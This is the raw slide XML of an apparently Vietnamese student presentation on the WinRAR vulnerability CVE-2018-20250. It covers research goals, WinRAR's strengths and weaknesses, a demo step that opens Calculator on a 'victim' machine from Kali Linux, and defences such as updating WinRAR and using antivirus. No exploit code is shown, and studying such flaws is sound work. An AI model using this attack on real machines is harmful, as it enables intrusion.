              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1192" name="Google Shape;1192;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4012650" y="1796588"/>
            <a:ext cx="4418125" cy="2188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99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713125" y="1181800"/>
            <a:ext cx="77178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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Tới bước coi như ta đã thành công truy cập vào máy victim, giờ hãy thử mở phần mềm Calculator từ Kali Linux</a:t>
            </a:r>
            <a:endParaRPr sz="2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100"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1121410" y="1181800"/>
            <a:ext cx="6900924" cy="3417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pic>
        <p:nvPicPr>
          <p:cNvPr id="1207" name="Google Shape;1207;p101"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099297" y="1181797"/>
            <a:ext cx="6945445" cy="3417600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208" name="Google Shape;1208;p10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Thành qu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ả</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02"/>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Cách phòng chống</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;p102"/>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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Cách phòng chống hiệu quả nhất là phải thường xuyên cập nhật các phiên bản </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>WinRAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> mới nhất.</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03"/>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03"/>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Cài đặt phần mềm diệt virus: Cài đặt phần mềm chống virus xâm nhập cũng là một giải pháp được các chuyên gia khuyến cáo. Lưu ý, người dùng nên quét virus trước khi tải phần mềm về máy.</a:t>
            </a:r>
            <a:endParaRPr sz="2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04"/>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THANKS !</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1227" name="Google Shape;1227;p104"/>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Please keep this slide as attribution.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2"/>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Tổng quan về vấn đề được nghiên cứu</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="987" name="Google Shape;987;p62"/>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600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Nghiên cứu các thông tin bảo mật, cách quản lý, khai thác hệ thống trên Windows 10.</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Nghiên cứu hệ điều hành Kali Linux.</a:t>
            </a:r>
            <a:endParaRPr sz="26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rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Nghiên cứu phần mềm WinRAR (version &lt;= 5.61)</a:t>
            </a:r>
            <a:endParaRPr sz="2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63"/>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3"/>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700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Nghiên cứu các công cụ khai thác lỗ hổng.</a:t>
            </a:r>
            <a:endParaRPr sz="27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2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Khảo sát thực trạng:</a:t>
            </a:r>
            <a:endParaRPr sz="27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rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Ưu điểm: Thuật toán nén RAR. Điều này cho phép tạo ra các tài liệu lưu trữ cũng như mã hóa dữ liệu.</a:t>
            </a:r>
            <a:endParaRPr sz="27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4"/>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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Nó cho phép tỉ lệ nén tốt hơn so với các đối thủ cạnh tranh của nó.</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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Giao diện phù hợp cho những người mới bắt đầu thông qua một trợ lý, cũng như cho những người đòi hỏi khắt khe nhất.</a:t>
            </a:r>
            <a:endParaRPr sz="2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5"/>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5"/>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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Nhược điểm: Chất lượng luôn luôn có giá. Nhiều người sử dụng nên thường xuyên là mục tiêu bị các hacker nhắm đến.</a:t>
            </a:r>
            <a:endParaRPr sz="2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6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Nhiệm vụ</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1011" name="Google Shape;1011;p66"/>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600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Tìm hiểu lỗi bảo mật CVE-2018-20250 trên </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>WinRAR</a:t>
            </a:r>
            <a:endParaRPr sz="26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2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Tìm hiểu hệ điều hành Kali Linux.</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Tìm hiểu các công cụ hỗ trợ bảo mật.</a:t>
            </a:r>
            <a:endParaRPr sz="26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rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Tìm hiểu các kỹ thuật tấn công.</a:t>
            </a:r>
            <a:endParaRPr sz="2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